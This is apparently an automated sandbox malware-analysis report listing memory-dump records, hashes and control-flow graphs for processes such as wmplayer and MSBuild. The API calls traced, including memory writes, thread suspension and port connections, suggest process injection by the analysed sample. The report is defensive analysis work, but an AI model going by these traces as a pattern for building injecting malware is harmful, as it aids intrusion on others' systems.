                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: _malloc_dbg
                                              • String ID:
                                              • API String ID: 1527718024-0
                                              • Opcode ID: 7aac0fcb7c972547ff5d390886f6270a0f974cec2218a33fb889b5e6a18d3d37
                                              • Instruction ID: 6fdd316cdcabbe8dcdd030b0dc2773f75ce6532b8b6cd0f25e3062a793cd47b1
                                              • Opcode Fuzzy Hash: 7aac0fcb7c972547ff5d390886f6270a0f974cec2218a33fb889b5e6a18d3d37
                                              • Instruction Fuzzy Hash: FFD01260A0680A0BBB9076FB1CCE13929A8DB682027000022E819C0260EA08C9A4E3A2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: 551c0ffc82b28a3876ee79cfc9de3840c8837f1e4274ad0e5daf9a8a7b3ff23c
                                              • Instruction ID: ce73bb61f9965403c20b41c9d7dcb3e438ae0187149ca172b124bef6df8f2bb1
                                              • Opcode Fuzzy Hash: 551c0ffc82b28a3876ee79cfc9de3840c8837f1e4274ad0e5daf9a8a7b3ff23c
                                              • Instruction Fuzzy Hash: 15B01224D27C4F12ED4C33770E991293660AF58202FC40025E806C4858E54CC494A346
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: ??3@
                                              • String ID:
                                              • API String ID: 613200358-0
                                              • Opcode ID: b7031c71d370f0c4b9d1add862bc0dfec61c612abdfff09cb5e9d61695c69b58
                                              • Instruction ID: a5356095c1e1a37d0c2f3a8994a8d6e821e55e7e3c52aa9368b769787605e466
                                              • Opcode Fuzzy Hash: b7031c71d370f0c4b9d1add862bc0dfec61c612abdfff09cb5e9d61695c69b58
                                              • Instruction Fuzzy Hash: 02B0123489BD4B52FD0C337A4DF915939A0BF54201FC50036D806C0150E60EC09A47DA
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: lstrcmpi
                                              • String ID:
                                              • API String ID: 1586166983-0
                                              • Opcode ID: dd3043cd4fdbf6ce1bec2523c8a3e90b76413ae5d3024df9cc9149889a1f6f13
                                              • Instruction ID: 8b0a3dd2c0337c8a9d0c4f8ac63d94c0d81101f5114dcca953d7499ebbbcbbd3
                                              • Opcode Fuzzy Hash: dd3043cd4fdbf6ce1bec2523c8a3e90b76413ae5d3024df9cc9149889a1f6f13
                                              • Instruction Fuzzy Hash: 9C119A31B145497BE7599B789CD92BB36E2FFD4200B440236D80BC61A6EF289D448744
                                              APIs
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID: FreeVirtual
                                              • String ID:
                                              • API String ID: 1263568516-0
                                              • Opcode ID: 85f62002f11eda201487085593c698b0135f5f3e41b5990a1ae8dfcda2a01f33
                                              • Instruction ID: 68e13d6cc7c42ff1e043b8e5d6c64f08a68e6b8f2b474f7842b5117ce199fded
                                              • Opcode Fuzzy Hash: 85f62002f11eda201487085593c698b0135f5f3e41b5990a1ae8dfcda2a01f33
                                              • Instruction Fuzzy Hash: 98016730A58D4D5BE798DB2C8C9422132E2FB98355755817AE00FC62E4EA29DC42C712
                                              Memory Dump Source
                                              • Source File: 00000011.00000003.1740346650.00007DF421881000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF421881000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_3_7df421881000_OpenWith.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: 46f5df41ea43a57528ce76f95f617c5d60ae02f95908509022172248d9e28bd8
                                              • Instruction ID: 317b8491c6c81d94af8fc2b3a06f72133790875556e8c436f9feff669d1d81d5
                                              • Opcode Fuzzy Hash: 46f5df41ea43a57528ce76f95f617c5d60ae02f95908509022172248d9e28bd8
                                              • Instruction Fuzzy Hash: FFB01130E28808C2C2280E0AF802330F2B0C30B300F00303A2000F3A20C8BACC82008F
                                              Memory Dump Source
                                              • Source File: 00000011.00000002.1740887784.000001F664380000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001F664380000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_17_2_1f664380000_OpenWith.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
                                              • Instruction ID: 9c6f723353de5f7bfac1b68b00d860ec9f8fa9508ac40f659eae0282c9a534f1
                                              • Opcode Fuzzy Hash: d522c07823fb8778296108337a3d1ec347010d1dae431256f70b68abef76ec51
                                              • Instruction Fuzzy Hash: 26B01132E28A0082E3880E0AB8023B0F2B0C30B300F00B0322008F3220C828CC08028F

                                              Execution Graph

                                              Execution Coverage:13.8%
                                              Dynamic/Decrypted Code Coverage:100%
                                              Signature Coverage:0%
                                              Total number of Nodes:40
                                              Total number of Limit Nodes:4
                                              execution_graph 12200 d42a40 12201 d42a44 12200->12201 12203 d42d3f 12201->12203 12204 d42d65 12203->12204 12211 d439e8 12204->12211 12216 d43b0f 12204->12216 12220 d43b10 12204->12220 12224 d43adb 12204->12224 12228 d43a18 12204->12228 12205 d42e45 12213 d439ed 12211->12213 12212 d439fe 12212->12205 12213->12212 12233 d48b10 12213->12233 12214 d43d82 12214->12205 12217 d43b25 12216->12217 12219 d48b10 GlobalMemoryStatusEx 12217->12219 12218 d43d82 12218->12205 12219->12218 12221 d43b25 12220->12221 12223 d48b10 GlobalMemoryStatusEx 12221->12223 12222 d43d82 12222->12205 12223->12222 12225 d43ade 12224->12225 12225->12205 12227 d48b10 GlobalMemoryStatusEx 12225->12227 12226 d43d82 12226->12205 12227->12226 12229 d43a16 12228->12229 12229->12228 12230 d43a5e 12229->12230 12232 d48b10 GlobalMemoryStatusEx 12229->12232 12230->12205 12231 d43d82 12231->12205 12232->12231 12234 d48b45 12233->12234 12238 d48dc7 12234->12238 12241 d48dc8 12234->12241 12237 d48ba7 12237->12214 12244 d48dff 12238->12244 12239 d48dd6 12239->12237 12242 d48dd6 12241->12242 12243 d48dff GlobalMemoryStatusEx 12241->12243 12242->12237 12243->12242 12245 d48e35 12244->12245 12246 d48e0d 12244->12246 12247 d48e56 12245->12247 12248 d48f1e GlobalMemoryStatusEx 12245->12248 12246->12239 12247->12239 12249 d48f4e 12248->12249 12249->12239

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1106 d48dff-d48e0b 1107 d48e35-d48e54 call d48668 1106->1107 1108 d48e0d-d48e34 call d4865c 1106->1108 1114 d48e56-d48e59 1107->1114 1115 d48e5a-d48eb9 1107->1115 1122 d48ebf-d48f4c GlobalMemoryStatusEx 1115->1122 1123 d48ebb-d48ebe 1115->1123 1127 d48f55-d48f7d 1122->1127 1128 d48f4e-d48f54 1122->1128 1128->1127
                                              Memory Dump Source
                                              • Source File: 00000019.00000002.3764474511.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_25_2_d40000_MSBuild.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID:
                                              • API String ID:
                                              • Opcode ID: abe4175c125b4782cd8111dc4be8bf4da0f0e8de92404a2fdd0c4f44e1069290
                                              • Instruction ID: 00822c76a9429f4441422a8a5aab15d95c7204936bd765f4b1f6b48704e9391a
                                              • Opcode Fuzzy Hash: abe4175c125b4782cd8111dc4be8bf4da0f0e8de92404a2fdd0c4f44e1069290
                                              • Instruction Fuzzy Hash: E141E171E0438A8FCB14DFA9D8147AEBBF1EF89310F15856AD408E7291DB749845CBE1

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 1131 d48ed8-d48f16 1132 d48f1e-d48f4c GlobalMemoryStatusEx 1131->1132 1133 d48f55-d48f7d 1132->1133 1134 d48f4e-d48f54 1132->1134 1134->1133
                                              APIs
                                              • GlobalMemoryStatusEx.KERNEL32 ref: 00D48F3F
                                              Memory Dump Source
                                              • Source File: 00000019.00000002.3764474511.0000000000D40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00D40000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_25_2_d40000_MSBuild.jbxd
                                              Similarity
                                              • API ID: GlobalMemoryStatus
                                              • String ID:
                                              • API String ID: 1890195054-0
                                              • Opcode ID: 478d5d9b72bdb9f2f42195a724577348c1a53393685644660f09f360b5a38dcc
                                              • Instruction ID: 58708720b9361873de3e1fd2a9c785c00a747f59164660202f183e876d89eecb
                                              • Opcode Fuzzy Hash: 478d5d9b72bdb9f2f42195a724577348c1a53393685644660f09f360b5a38dcc
                                              • Instruction Fuzzy Hash: A11120B1C0065A9BDB20DF9AC444BDEFBF4AF48320F14812AE818B7240D778A945CFA1
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000003.1679091354.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_3_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: MemoryVirtual$Read$Protect$Write$AllocateInformationProcessQuery_calloc_dbg
                                              • String ID: H$H
                                              • API String ID: 3959100322-136785262
                                              • Opcode ID: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                              • Instruction ID: 9772ab89b7813a6017120309538bc158c7eba5a53463929c29607f35e14dca55
                                              • Opcode Fuzzy Hash: 8b723a4ddad616be20f9dda8abf44bc9042e1d61a48c0cd72079f3722cd3507a
                                              • Instruction Fuzzy Hash: 72B184B060DB888FD764DF58D885A9AB7F5FBD4344F000A2EE58EC3251EB34E5458B86

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 0 23076702d24-23076702d80 call 230766f4998 3 23076702d86-23076702de7 call 230766f6da4 * 3 call 230766f32f8 call 230766f6da4 0->3 4 23076703dc7-23076703ded call 23076704500 0->4 18 23076703db4-23076703db5 3->18 19 23076702ded-23076703700 3->19 20 23076703db9-23076703dc2 call 230766f49f4 18->20 21 23076703855-2307670385d 19->21 22 23076703706-23076703711 19->22 20->4 24 230767038d0-230767038e1 21->24 25 2307670385f-23076703864 21->25 22->21 26 23076703717-23076703725 22->26 30 230767038e3-230767038fb 24->30 31 2307670393a-23076703940 24->31 25->24 32 23076703866-23076703870 RtlFormatCurrentUserKeyPath 25->32 27 23076703850-23076703851 26->27 28 2307670372b-23076703733 26->28 27->21 28->27 33 23076703739-23076703751 28->33 30->31 48 230767038fd-23076703905 30->48 34 23076703942-23076703943 31->34 35 2307670396b-2307670397e 31->35 32->24 36 23076703872-23076703883 32->36 37 23076703844-23076703848 33->37 38 23076703757-23076703758 33->38 39 23076703945-23076703964 34->39 35->18 52 23076703984-2307670398f 35->52 41 23076703885-23076703891 36->41 42 2307670389e-230767038a6 36->42 47 2307670384a-2307670384b 37->47 43 2307670375b-2307670376b 38->43 39->39 44 23076703966-23076703967 39->44 55 23076703893-2307670389c 41->55 56 230767038c7-230767038c8 41->56 45 230767038a8-230767038c4 call 230766f1000 42->45 50 2307670377d-2307670377f 43->50 44->35 45->56 47->27 53 23076703917 48->53 54 23076703907-23076703915 48->54 58 23076703781-23076703786 50->58 59 2307670376d-2307670377b 50->59 52->18 60 23076703995-230767039a3 52->60 53->31 61 23076703919-23076703934 53->61 54->31 55->45 56->24 62 23076703811-23076703814 58->62 63 2307670378c 58->63 59->50 60->18 64 230767039a9-230767039b1 60->64 61->31 65 23076703821-23076703830 62->65 66 23076703816-2307670381a 62->66 67 2307670378e-23076703795 63->67 64->18 68 230767039b7-230767039d7 _calloc_dbg 64->68 65->43 70 23076703836-23076703842 65->70 66->65 69 2307670381c-2307670381d 66->69 71 23076703797-230767037ab 67->71 72 230767037af-230767037db 67->72 68->18 73 230767039dd-23076703a01 68->73 69->65 70->47 71->67 74 230767037ad 71->74 75 23076703803-23076703804 72->75 76 230767037dd-230767037f1 call 2307670452c 72->76 77 23076703b20-23076703b5b 73->77 78 23076703a07-23076703a1a 73->78 74->62 79 23076703809-2307670380a 75->79 76->75 88 230767037f3-23076703801 76->88 86 23076703bb3-23076703bc3 77->86 87 23076703b5d-23076703b5e 77->87 81 23076703a1c-23076703a26 78->81 79->62 84 23076703af1-23076703b03 81->84 85 23076703a2c-23076703a30 81->85 84->81 89 23076703b09-23076703b1e 84->89 85->84 90 23076703a36-23076703a80 call 23076704540 85->90 86->18 100 23076703bc9-23076703bdf 86->100 92 23076703b60-23076703b68 87->92 88->79 89->77 97 23076703a94-23076703a96 90->97 94 23076703b95-23076703ba9 92->94 95 23076703b6a-23076703b6f 92->95 94->92 99 23076703bab-23076703bac 94->99 95->94 98 23076703b71-23076703b7a 95->98 103 23076703a82-23076703a92 97->103 104 23076703a98-23076703aae 97->104 105 23076703b7d-23076703b80 98->105 99->86 101 23076703be1-23076703be2 100->101 102 23076703c55-23076703c5b 100->102 106 23076703be4-23076703bef 101->106 111 23076703c5d-23076703c61 102->111 112 23076703cae-23076703cb5 102->112 103->97 107 23076703ab0-23076703ab8 104->107 108 23076703aed 104->108 109 23076703b82 105->109 110 23076703b89-23076703b93 105->110 113 23076703c00-23076703c14 106->113 114 23076703bf1-23076703bfe 106->114 107->108 117 23076703aba 107->117 108->84 109->110 110->94 110->105 118 23076703c68-23076703c73 111->118 115 23076703d62-23076703d64 112->115 116 23076703cbb-23076703cdb call 230766f32f8 112->116 113->102 121 23076703c16 113->121 114->113 133 23076703c18-23076703c27 114->133 124 23076703d90-23076703d99 115->124 125 23076703d66-23076703d70 115->125 134 23076703cf0-23076703d04 call 230766f32f8 116->134 135 23076703cdd-23076703cee call 230766f35b4 116->135 123 23076703abc-23076703ad5 call 2307670452c 117->123 119 23076703c95-23076703cac 118->119 120 23076703c75-23076703c81 118->120 119->112 119->118 120->119 126 23076703c83-23076703c8a 120->126 121->106 141 23076703ae1-23076703ae7 123->141 142 23076703ad7-23076703add 123->142 124->20 131 23076703d9b-23076703db2 call 230766f6db4 call 230766f55f0 124->131 125->124 130 23076703d72-23076703d8c 125->130 126->119 132 23076703c8c-23076703c93 126->132 130->124 131->20 132->119 138 23076703c48 133->138 139 23076703c29-23076703c46 133->139 134->115 153 23076703d06-23076703d17 call 230766f35b4 134->153 135->134 152 23076703d19-23076703d2f call 23076702310 135->152 148 23076703c4d-23076703c4f 138->148 139->148 141->108 142->123 147 23076703adf 142->147 147->108 148->102 148->124 152->115 158 23076703d31-23076703d41 152->158 153->115 153->152 158->115 160 23076703d43-23076703d5c 158->160 160->115
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: CurrentFormatPathUser_calloc_dbg
                                              • String ID: ;$dW$;$dW$MZ$MZ$N$t$;Ln
                                              • API String ID: 2292065830-84560671
                                              • Opcode ID: 1512b8534d4c685afcc9061355cc33150ae67fa718ee72ec55426bd84ba67b64
                                              • Instruction ID: 089245b4c89d3120e86c197d792ff3d65f277fee1823cd46e4f25ecfef9271bd
                                              • Opcode Fuzzy Hash: 1512b8534d4c685afcc9061355cc33150ae67fa718ee72ec55426bd84ba67b64
                                              • Instruction Fuzzy Hash: 87A28DB0518B888FD375DF18D8887EBB7E4FB99711F500A2ED48AC3251DB74A541CB92
                                              APIs
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000003.1679091354.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_3_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: Close$??3@ChangeCreateFindFunctionInformationNotificationOpenProcessProtectQueryResumeTableThreadValueVirtualVolume_calloc_dbg
                                              • String ID: -
                                              • API String ID: 3202447450-2547889144
                                              • Opcode ID: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                              • Instruction ID: 5a24a107154d6932b82a438a428c0a9f8a4f0f9ccedc472a7c8ef417ec4acdfa
                                              • Opcode Fuzzy Hash: 105c85825427e7c8ed203293b96c467a96f9bba36c05be2648f83f100e5bc7da
                                              • Instruction Fuzzy Hash: 5B91B3B0A0EA894FEB54EB24C9956AB73F1FF94345F40452AD54BC31A1EF78E8018792

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3765088712.00007DF4ADB81000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB81000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb81000_wmplayer.jbxd
                                              Similarity
                                              • API ID: InformationQuerySystem$??3@_malloc_dbg
                                              • String ID:
                                              • API String ID: 1074928427-0
                                              • Opcode ID: eaf85d99e703aa885d9be82610ad3d8d03a394a4204a017367fdf17adc8f3dbe
                                              • Instruction ID: 760dcc45763e1483304de3a823aff1aecc653ed6d704cf36ac4561d48a118f05
                                              • Opcode Fuzzy Hash: eaf85d99e703aa885d9be82610ad3d8d03a394a4204a017367fdf17adc8f3dbe
                                              • Instruction Fuzzy Hash: 4E013134B1A9459FE785EF25DD68B6A77F1FBA4305F440128E40BC21A0DF38D945CB42

                                              Control-flow Graph

                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: NamedPipe$BindCallbackCompletionConnectCreate
                                              • String ID:
                                              • API String ID: 2502124517-0
                                              • Opcode ID: 1f39a579d535edce93b33f8ad890ac1eeea552d42be0d6d7d28d92d913c1a808
                                              • Instruction ID: d7716e007f28d46482db4f0c892227484504a1a5aa4b69452fffb4d4e163a579
                                              • Opcode Fuzzy Hash: 1f39a579d535edce93b33f8ad890ac1eeea552d42be0d6d7d28d92d913c1a808
                                              • Instruction Fuzzy Hash: 9431B370208A488FE7A5EF28D8D8B9AB7E4FB88310F504A29D05BC31D5DF78D945CB81

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 266 23076702c64-23076702c7d 267 23076702c87-23076702c8a 266->267 268 23076702c7f-23076702c82 266->268 270 23076702c96-23076702cab 267->270 271 23076702c8c-23076702c91 267->271 269 23076702d1a-23076702d22 268->269 272 23076702cb7-23076702ce6 270->272 273 23076702cad-23076702cb1 270->273 271->269 274 23076702cf6 272->274 275 23076702ce8-23076702cf4 NtAcceptConnectPort 272->275 273->272 276 23076702cfb-23076702cfd 274->276 275->276 277 23076702d18 276->277 278 23076702cff-23076702d09 276->278 277->269 279 23076702d11 278->279 280 23076702d0b-23076702d0f 278->280 281 23076702d16 279->281 280->281 281->277
                                              Strings
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID:
                                              • String ID: 0
                                              • API String ID: 0-4108050209
                                              • Opcode ID: f6b0f352e34b93935ac2a1f97fa2b0892be8d0a68ee0d9962c8f94757f801c03
                                              • Instruction ID: bf066a7bc84288b4b3dbed918764fa259ea33b98e8ef460af117582b3b47517d
                                              • Opcode Fuzzy Hash: f6b0f352e34b93935ac2a1f97fa2b0892be8d0a68ee0d9962c8f94757f801c03
                                              • Instruction Fuzzy Hash: E621C37270494C4FE7509EA888D83ABB2D4E798381F70053EE94AC3250DA28DE44C761

                                              Control-flow Graph

                                              • Executed
                                              • Not Executed
                                              control_flow_graph 354 230766f2628-230766f2662 call 23076732c58 357 230766f2668-230766f267c call 23076732c52 Thread32First 354->357 358 230766f2734-230766f2737 354->358 364 230766f2681-230766f2686 357->364 359 230766f273d-230766f2745 358->359 360 230766f288a-230766f289d 358->360 359->360 362 230766f274b-230766f274c 359->362 365 230766f274e-230766f2767 362->365 366 230766f268c-230766f2696 364->366 367 230766f2712-230766f271e call 23076732c4c 364->367 372 230766f276d-230766f2784 SuspendThread 365->372 373 230766f287a-230766f2884 365->373 366->367 374 230766f2698-230766f26a2 366->374 371 230766f2723-230766f2725 367->371 371->364 375 230766f272b-230766f272e FindCloseChangeNotification 371->375 376 230766f2792-230766f2794 372->376 373->360 373->365 374->367 382 230766f26a4-230766f26aa 374->382 375->358 378 230766f286f-230766f2878 376->378 379 230766f279a-230766f279e 376->379 378->373 380 230766f27ac-230766f27ad 379->380 381 230766f27a0-230766f27aa 379->381 383 230766f27b0-230766f27b2 380->383 381->383 385 230766f26ac-230766f26ce 382->385 386 230766f26d2-230766f26d8 382->386 383->378 387 230766f27b8-230766f27ce 383->387 385->375 394 230766f26d0 385->394 388 230766f26da-230766f26f4 386->388 389 230766f2701-230766f270e 386->389 390 230766f27d0-230766f27e1 387->390 388->375 396 230766f26f6-230766f26fe 388->396 389->367 392 230766f27fa 390->392 393 230766f27e3-230766f27e6 390->393 399 230766f27fc-230766f2806 392->399 397 230766f27e8-230766f27f1 393->397 398 230766f27f3-230766f27f8 393->398 394->389 396->389 397->399 398->399 400 230766f285e-230766f2866 399->400 401 230766f2808-230766f280a 399->401 400->390 402 230766f286c-230766f286d 400->402 403 230766f28a9-230766f28ad 401->403 404 230766f2810-230766f281d 401->404 402->378 405 230766f28af-230766f28b9 403->405 406 230766f28bb-230766f28c8 403->406 407 230766f281f-230766f282a 404->407 408 230766f2839 404->408 405->406 409 230766f283b-230766f283e 405->409 412 230766f28ca-230766f28d6 406->412 413 230766f28e5-230766f28e9 406->413 410 230766f289e-230766f28a7 407->410 411 230766f282c-230766f2837 407->411 408->409 409->400 414 230766f2840-230766f2857 409->414 410->409 411->407 411->408 416 230766f28d8-230766f28e3 412->416 417 230766f28f7-230766f28ff 412->417 413->408 415 230766f28ef-230766f28f2 413->415 414->400 415->409 416->412 416->413 417->409
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: ChangeCloseFindNotificationSuspendThread
                                              • String ID:
                                              • API String ID: 186804629-0
                                              • Opcode ID: ee0b4b29cbf429cf193f7da3647d56e0b1a845656fd74a12addcfb7ee39e090b
                                              • Instruction ID: 63a0b2494ff6d9829d05358cd663f01a5f6edb0818f04b51946c4e9ba8abd4da
                                              • Opcode Fuzzy Hash: ee0b4b29cbf429cf193f7da3647d56e0b1a845656fd74a12addcfb7ee39e090b
                                              • Instruction Fuzzy Hash: 32911730208A098BEB78DB98E8E93B9B3D6FB45310F94415DD05BC7181DA39F942CF91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3764684590.00007DF4ADB71000.00000020.00000001.00020000.00000000.sdmp, Offset: 00007DF4ADB71000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_7df4adb71000_wmplayer.jbxd
                                              Similarity
                                              • API ID: FunctionProtectTableTimerVirtual
                                              • String ID:
                                              • API String ID: 2248422592-0
                                              • Opcode ID: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                              • Instruction ID: 97f79349758dfb63dd7bcd18d87db9611e16dcd9abc0e25f58b4b0938a69c574
                                              • Opcode Fuzzy Hash: 907297c01f2e853a7e6e6be3efaf92a15819b9f7a160a726e89f0d05781fa5e1
                                              • Instruction Fuzzy Hash: 4BE18270609A488FEB58EF28D9895AA77F1FF98304F14463EE44BC35A1DF38E9458B41
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AllocVirtual
                                              • String ID:
                                              • API String ID: 4275171209-0
                                              • Opcode ID: 1463b6e579e83794cd598155eb9e3160b38bf0e3bcb0f61670329aaf0c67c5a2
                                              • Instruction ID: 2fd00e9469a0d9a7caa52b9f6b5cd2177eac19b11aec270a95cef180dc534622
                                              • Opcode Fuzzy Hash: 1463b6e579e83794cd598155eb9e3160b38bf0e3bcb0f61670329aaf0c67c5a2
                                              • Instruction Fuzzy Hash: BBF13A316185680EE73C9B6CA8D62BAB7D1F785301F28466ED4DBC2283D938D647CB91
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: f13696e1930880e2e19ebf6412232386b6a4ab7a0f564d2111b2459b68bcc0da
                                              • Instruction ID: 118e2607736304dcb5061b5ee16ff20a9b36bca8d84c73fd4a856cbfcb7758b7
                                              • Opcode Fuzzy Hash: f13696e1930880e2e19ebf6412232386b6a4ab7a0f564d2111b2459b68bcc0da
                                              • Instruction Fuzzy Hash: 8981DA72218B0DCBE775DA94D4E87EBF3D0FB94380F604619E857C3190EA68EA04C671
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: d9381645012d00cf6e7f8dfe8da443d67e907387f0873f85681973196ff3555c
                                              • Instruction ID: b1cbb984666889265ebb6ed083bd97891c6b3ff4d60a26f6aaad372476a4765d
                                              • Opcode Fuzzy Hash: d9381645012d00cf6e7f8dfe8da443d67e907387f0873f85681973196ff3555c
                                              • Instruction Fuzzy Hash: F9F0DA74A18B488FDBA4EF2CD4C9B9AB7E0FB99300F504519E84CC3245DB34E8848B86
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 98d03459468cdcd74854b97b597847e55f0ea75636d4913b4c299d0c762e3800
                                              • Instruction ID: 1c5ff5546ae45f2ccb9f69a9e2d62bc5dcf26cb5ed29a0ec496e10f14054b19f
                                              • Opcode Fuzzy Hash: 98d03459468cdcd74854b97b597847e55f0ea75636d4913b4c299d0c762e3800
                                              • Instruction Fuzzy Hash: A4E09271218A088FDB00DF98CCC59AAF3E4E7D9300F404D6AE89BC6164D264E648CAA2
                                              APIs
                                              Memory Dump Source
                                              • Source File: 0000001A.00000002.3755154542.00000230766F1000.00000020.00000001.00020000.00000000.sdmp, Offset: 00000230766F1000, based on PE: false
                                              Joe Sandbox IDA Plugin
                                              • Snapshot File: hcaresult_26_2_230766f1000_wmplayer.jbxd
                                              Similarity
                                              • API ID: AcceptConnectPort
                                              • String ID:
                                              • API String ID: 1658770261-0
                                              • Opcode ID: 1d483c746a178fd7cebb358bd60c8d391381be698edd62c71eedc0381d53c554
                                              • Instruction ID: 97090545484e28298aa0439c8f36007ebb6b91b509c14616adf7f4e6f581f1b1
                                              • Opcode Fuzzy Hash: 1d483c746a178fd7cebb358bd60c8d391381be698edd62c71eedc0381d53c554
                                              • Instruction Fuzzy Hash: AED0A739A28B4D4FEA50B768898030777D1F7D5308F9046089849C3294D62DE50083D2
                                              APIs
                                              Memory Dump Source
